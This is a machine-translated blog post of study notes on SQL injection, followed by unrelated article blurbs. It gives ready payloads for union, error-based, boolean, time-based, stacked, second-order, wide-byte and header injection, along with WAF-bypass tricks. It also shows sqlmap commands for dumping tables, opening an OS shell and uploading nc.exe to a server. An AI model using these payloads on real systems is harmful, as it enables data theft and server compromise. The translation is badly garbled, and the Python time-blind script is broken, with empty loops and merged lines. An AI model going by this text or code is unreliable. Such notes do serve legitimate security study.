Because my blog is only done when I learn penetration , Nothing about it WEB Notes on vulnerabilities , Now find WEB I'm not familiar with the loopholes at the level , Write notes and review , From sql Let's start

If you don't say much, first go to the table written by the boss [ctfhub]SQL Inject - h3zh1 - Blog Garden (, The basic common manual injection commands are here

union select The joint query , Joint injection is commonly used
database() Echo the currently connected database
version() View the current sql The version of :mysql 1.2.3, mariadb-4.5.6
group_concat() Use the values in the generated same group with , Connect , Form a string
information_schema Saved a lot mysql Database of information
information_schema.schemata information_schema A table of the library , be known as schemata
schema_name schemata Table storage mysql All database name fields
information_schema.tables Save mysql All the watches
table_schema tables The database name field corresponding to each table is stored in the table
table_name The name of the table and table_schema One-to-one correspondence
information_schema.columns columns The table stores the information of all columns 4
column_name When you know the name of a watch , All field names in the table can be obtained through secondary fields ( Name )
table_name The name of the table and column_name One-to-one correspondence
select updatexml(1,concat(0x7e,database(),0x7e),1); Note here , Only in databse() Correct the content you want, and then the error will be echoed
right(str, num) The string is intercepted from the right num Characters
left(str,num) Empathy : The string is intercepted from the left num Characters
substr(str,N,M) character string , From N Character start , Intercept M Characters

SQL Principle of injection

SQL The generation of injection leakage needs to meet the following two conditions

  • User controlled parameters : The parameters passed from the front end to the back end can be controlled by the user .
  • Parameters are brought into the data car for query : The incoming parameters are spliced into SQL sentence , And brought into the data car for query

When incoming D Parameter is and1=1 when , Executive SQL sentence .(# The symbol indicates the comment character )

select from users where id=1 and 1=1#

because 1=1 It's true , And wherei In the sentence id=1 It's true , So the page will return with id=1 Same result . When incoming ID Parameter is and1=2 when , because 1=2 Don't set up , So return false , The page will return to id=1 Different results

Through this short statement, you can preliminarily judge whether the parameter exists SQL Inject holes , If it is verified that an attacker can further splice SQL Statement to attack , Cause the database to leak , Even get server permissions


Union Injection attack

After judging the injection point , Use order by Determine the number of fields in the data table

For example, enter this , Echoed and id=1 The same result

id=1 order by 4#

but order by 5 Then different results were echoed , Then the number of fields is 4

After judging the number of fields, use union Inject , Determine the location of the echo field

Use union Note that the injection parameter is set to -1, Otherwise, the database will query the parameter values first , Unable to determine echo position

id=-1 union select 1,2,3,4#

Then enter the attack code in the echoed field , for example 2 Is the echo word segment , Input database() You can view the database

id=-1 union select 1,database(),3,4#

Suppose you know that the database name is sqli, After knowing the database name , The query table name ,group_concat The function uses the values in the same group generated by , Connect , Form a string

id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema="sqli",3,4#

Suppose you know that the table name is flag, Query field name

id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name="flag",3,4#

Know the field name and check the field

id=-1 union select 1,group_concat(flag) from sqli.flag,3,4#

This is the basic union Injection idea , But in actual combat, there will be many filters to prevent attackers from obtaining database information   


Error injection attack

Error reporting injection can be performed after determining the injection point , But there are no echo fields , Use only when an error message is displayed

The key command is select updatexml(1,concat(0x7e,database(),0x7e),1);  stay database() Modify the statement you want to attack at

among 0x7e yes ASCII code , intend ~, It is used to distinguish between system error and key information

Next thoughts and union Inject the same , But one thing to note is that you need to use right Functions and left Function to query the fields echoed with errors , Because the number of fields echoed by error is usually limited , The database information required is relatively long  

right(str, num) The string is intercepted from the right num Characters
left(str,num) Empathy : The string is intercepted from the left num Characters

Usage examples

-1 union select updatexml(1,concat(0x7e,right(
(select(group_concat(schema_name))from information_schema.schemata)
,31 ),0x7e),1); #


Boolean Injection attack

When the page only displays yes or no, Without returning any data in the database , Just use Boolean Injection attack

use first Lenth() Function to determine the length of the database name

id=1 and lenth(database())>=1#

After querying the length of the database name , Use substr Function to get the database name word by word , The range of database names is generally a~z、0~9 within , There may also be some special characters

substr(str,N,M)  character string , From N Character start , Intercept M Characters

id=1 and substr(database(),1,1)='a'#

But generally, this method is slow and inefficient , Blasting is generally used , have access to bp Blasting , Use the returned byte length to determine whether it is correct

After the database name is exposed, the following methods are the same


Time injection attack

Time injection and Boolean Almost injection , The difference is that time injection is used to return nothing , Don't even return if it's correct .

Time injection utilization sleep Function let MySQL The execution time becomes longer to judge whether the injection is successful

The statement to judge the length of the database is


This means that if the length of the database name is greater than 1, Then pause for five seconds and execute , Otherwise, execute directly

After understanding the blind injection of time, you can attack with the starting idea


But time blind injection is better than manual injection Boolean Injection is slower , It's usually used python Script to implement blasting

Post the code

import requests
import time headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
word1 = []
word2 = []
# url = input("url:")
# t = input("sleep:") for i in range(65, 91):
for i in range(97, 123):
for i in range(48, 58):
word1.append('}') for i in range(97, 123):
for i in range(48, 58):
word2.append('}') for i in range(1, 40):
for j in word2:
url = "http://URL/?id=1 and if(substr((select flag from sqli.flag)," + str(i) + ",1)='" + str(j) + "',sleep(3),1)#"
t1 = time.time()
r = requests.get(url, headers) # send out GET request . return Response object .
t2 = time.time()
if t2 - t1 > 3:

Stack injection attack

Stacked queries can execute multiple statements , Each statement is separated by a semicolon . Stack Injection and union The difference between injection is , Stack injection can execute any statement , and union Injection is limited to query statements

For example, you can add or delete data to a database

id=1;insert into user(id,username,password)values('5','zhangsan','123456');#


Secondary injection attack

Second injection is that the attacker stores the attack code in the database through registration or other methods , When the database calls this attack code again , Will be attacked .

For example, the database itself has a admin Account but don't know its password , When we register an account named admin’# Construct a closed , Then change the password , The statement of the original database is

Update user set password=’New password‘ where username=‘admin‘#’ and password=’password‘

because admin There is #, The following statements will not execute , So the database will admin Change your password to the one we just changed


Wide byte injection attack

Wide byte injection is generally used when closed ‘/’ escape , In general, there is no SQL It's a bug injection . But there is an exception when the database code is GBK When .

’/‘ The code of is %5c,GBK and %df5c It's a traditional character with , So you can add... Before the escaped character %df The escape

XFF Injection attack

adopt BurpSuite Grab data , You can see HTTP There is a header parameter in the request header X- Forwarded-for.X- Forwarded-For abbreviation XF head , It represents the real... Of the client IP, By modifying the X- Forwarded-for The value of can be forged IP, take X- Forwarded-for Set to, And then visit URL, The page returns to normal

Use Union The injection method completes the injection

X-forwarded-for:' union select 1,2,3,4#


SQL Injection bypass technology

There are too many ways to bypass , The application scenarios of each method are also different , Don't talk about it carefully here , List common methods

  1. Case around : Commonly used for keyword filtering , because mysql Statement does not require case , You can use case to bypass
  2. Double writing bypasses : Commonly used for keyword filtering , for example and Filtered , It can be written. anandd
  3. Code bypass : Commonly used for keyword filtering , Use the filtered keywords URL Code twice , Because the server will automatically resolve it once
  4. Space around : Spaces are filtered , Use /**/ Instead of spaces
  5. Inline comments bypass : Commonly used for keyword filtering , Use /*! and*/ Put keywords and Wrap around

When using manual injection, a variety of bypass methods can be combined , The probability of success is greater .

Automation tools sqlmap Introduction of usage

sqlmap It's about sql Automated tools for injecting vulnerabilities

sqlmap -h view help

sqlmap Basics

GET The ginseng

Read the current database version

sqlmap -u http://URL/?id=1 –current-user –current-db

Detect whether there are injection points

sqlmap -u http://URL/?id=1

Take the library name

sqlmap -u http://URL/?id=1 --dbs

Suppose you get the library name sqli, Take the watch name

sqlmap -u http://URL/?id=1 -D sqli --tables

Suppose you get the table name user, Take your name

sqlmap -u http://URL/?id=1 -D sqli -T user --columns

Suppose you get the column name user,password, Take the field

sqlmap -u http://URL/?id=1 -D sqli -T user -C user,password --dump

POST The ginseng

When the data submission method is post When , Use bp Grab the bag , Save the text test.txt,(test.txt If you don't put it in sqlmap The directory uses an absolute path ).

sqlmap -r test.txt -p id //-r Parameter open file ,-p Parameters for parameter injection .

The rest is just like GET In the same way

sqlmap Advanced

Here we mainly talk about how to bypass WAF

  • --level=5: Detection level ,1-5, The default is 1, The higher the rank ,payload The more , The slower the speed .HTTP cookei stay level by 2 It will be tested when ,HTTP User-Agent/Referer stay level by 3 It will be tested when .
  • --risk=RISK The risk of performing the test (0-3, The default is 1)
  • –threads    # Using multithreading (–threads 3)
  • --referer“”  // Simulation source , Which page did you jump from . If you don't understand, you can Google referer
  • --cookie=COOKIE: Set up http Requested cookie,level2 when , Will try to cookie Inject ,eg:"PHPSESSID=aaaa"
  • --user-agent: modify http In the request user-agent, It is usually modified to search engine UA Head to simulate search engine , Prevent sealing ip, You can also use --random-agent Parameters , Randomly from user-agent.txt In order to get .(level 3 Will try to user-agent Inject )

  • --proxy=PROXY: Connect to the target through a proxy server url
  • --delay=times : Delay Injection , Seconds per unit , Avoid attracting firewall attention

Of course, the simplest and most brutal way is to bypass the proxy pool , Go online to buy agents ( There are also free ones, but they are not easy to use ), Set up --porxy= agent ip, Change one every time you request ip, The firewall will not detect

sqlmap senior

  • --id-dba: Whether the current user has administrative rights
  • --roles: List database administrator roles , Only applicable to the current database is Oracle When
  • --referer= :sqlmap Can be forged in the request HTTP Medium referer, When –level Parameter set to 3 perhaps 3 At the above time, I will try to referer Inject
  • --sql-shell: Run custom sql sentence
  • --os-cmd,--os-shell: Run any operating system command
  • --file-read "C:/example.exe": Read files from database server
  • -u URL –file-write ”/software/nc.exe” –file-dest “C:/WINDOWS/Temp/nc.exe” Upload files to database server







WEB Loophole ——SQL More articles about

  1. understand web Loophole -sql Inject

    1: Why learn web Loophole ? As an operator , The daily work is to ensure the normal operation of the server and website , It is also necessary to strengthen the security of the server at ordinary times , When it comes to protecting against attacks , It takes so long to understand how an attacker launches a process against the server , In this way ...

  2. Basics Web Loophole -SQL Introduction to injection ( Manual injection )

    One . What is? SQL Inject  SQL It's a structured query language for operating database data , When the application data of the web page interacts with the data in the background database, it will adopt SQL. and SQL Injection is to Web The original of the page URL. The parameters entered in the form field or data package , Modify the splice to SQ ...

  3. The classic of hacker attack and Defense Technology Web Actual combat ( Two ) Tools section DVWA Web Vulnerability to learn

    DVWA It's a learning Web A good tool for vulnerabilities . DVWA All the way through Damn Vulnerable Web Application, There is also a tool as good as it ...

  4. web Summary of loopholes

    Catalog : 1.sql Inject to get database information 2.sql Injection bypasses management background login 3. reflective xss4. Storage type xss5.csrf6. Upload files 7. Brute force 8. Directory traversal 9. Permissions span 10. File contains 11. Unknown vulnerability web Loophole performance ...

  5. Various Web Vulnerability testing platform

    Sqli Lab​ Support error injection . The secondary injection . Blind note .Update Inject .Insert Inject .Http Head injection . Second injection exercises, etc . Support GET and POST Two ways . ...

  6. Web Vulnerability scanning tool ( Batch shelling 、 Deserialization 、CMS)

    One . What is? Web Vulnerability scanning tool Which means “ scanning Web Application to find security vulnerabilities ( Such as cross site script ,SQL Inject , Command execution , Directory traversal and insecure server configuration ) Automation tools for ”, Many of them may be caused by unsafe or incorrect coding and Design . On the other hand , ...

  7. 【web Infiltration technology 】 Penetration, attack and defense Web piece -SQL Injection attack primary

    [web Infiltration technology ] Penetration, attack and defense Web piece -SQL Injection attack primary The preface is written in any language Web application , They all have one thing in common , Interactive and mostly database driven . In the network , Database driven Web Applications are everywhere , So there is S ...

  8. WEB Loophole XSS( One )

    1.xss Formation principle of xss The Chinese name is “ Cross-site scripting attacks ”, English name “Cross Site Scripting”.xss It's also an injection attack , When web Application does not filter user input strictly , Attacker writes malicious script code (HTML ...

  9. web Vulnerability scanner collection

    The best use is open source Web Vulnerability scanning tools link symantec 2017 In the Internet Security Threat Report of 2007, it was proposed that in the websites they scanned this year , Yes 76% all ...

  10. [ Website security ] [ Actual combat sharing ]WEB Share some experience of vulnerability mining

    WEB There are many kinds of vulnerabilities , such as SQL Inject , such as XSS, For example, the file contains , Such as ultra vires access to view , For example, directory traversal and so on , There are many dangers brought by loopholes , Information disclosure , File upload to GETSHELL, All the way to intranet penetration , The main thing I want to share here is ...

Random recommendation

  1. 4 There's something you have to know Android Screen adaptation solutions

    Source of the article : demo download : ...

  2. use scrollTop Make an automatic scrolling bulletin board

    When we're browsing the web , I often see some scrolling Columns , For example, an announcement scrolling up . News, etc . In fact, their production is not difficult , As long as you learn the basics html.css.javascript You can do it , use JavaScript Of scrollT ...

  3. Visual How to use the console program in MFC Class library

    unresolved external symbol __beginthreadex Wrong solution Win32 Consle Application Use MFC Some classes such as CString I believe I will often encounter ...

  4. 【C++】 Count code coverage ( Two )

    Ouch, ouch !!! I'm so excited , I'm so stupid . But it was finally solved . Purring Some are checked piece by piece , If there is infringement, please send me a private letter , I noted the source . One gcov&CMake I tried yesterday. The test code and the tested code are c++ The situation of , straight ...

  5. C-- Implementation of Full Permutation ( Recursive method ) A fool can understand

      Suppose the array contains n Elements , Then extract each element in the array as a header element , Then arrange all the elements in the array except the first element , This achieves the goal of fully arranging all elements in the array .[ That's the point !] such as 1,2,3. Of ...

  6. Learn by remembering PHP-( 15、 ... and )MySQL Basic operation of database 2

    Four . Create a database using visualization tools Although using the command line feels more like our program , But I still prefer to use workbench To create a database . Start by opening workbench , A friendly interface opens , ha-ha . I prefer ...

  7. JDBC Frequently asked questions

    The following is my summary JDBC Knowledge point map : The knowledge points on the graph can be found in my other articles . JDBC Frequently asked questions JDBC To operate a database ? JDBC To operate a database ? Register database driver . Establish a database connection . ...

  8. js Common methods of array de duplication

    js Array de duplication is a common problem in an interview , Whether it's the front end or node.js There are two common forms of arrays , One is that each element of the array is a basic data type , The common format is array string , Form like ['a','b','c']; One is that the elements of the array are indefinite , ...

  9. TensorFlow From introduction to understanding ( 6、 ... and ): Visual gradient descent

    Run code : import tensorflow as tf import numpy as np import matplotlib.pyplot as plt from mpl_toolkits.m ...

  10. Centos Add static route under ( Temporary and permanent validity ) Operation record of

    company IDC An external network is deployed on the server room LB Environmental Science , The default configuration is Internet ip The routing address of , Due to the need to communicate with other intranet machines , So you need to configure the intranet ip The routing address of . The whole operation process , Record the following , For future reference : 1) Intranet card binding [ ...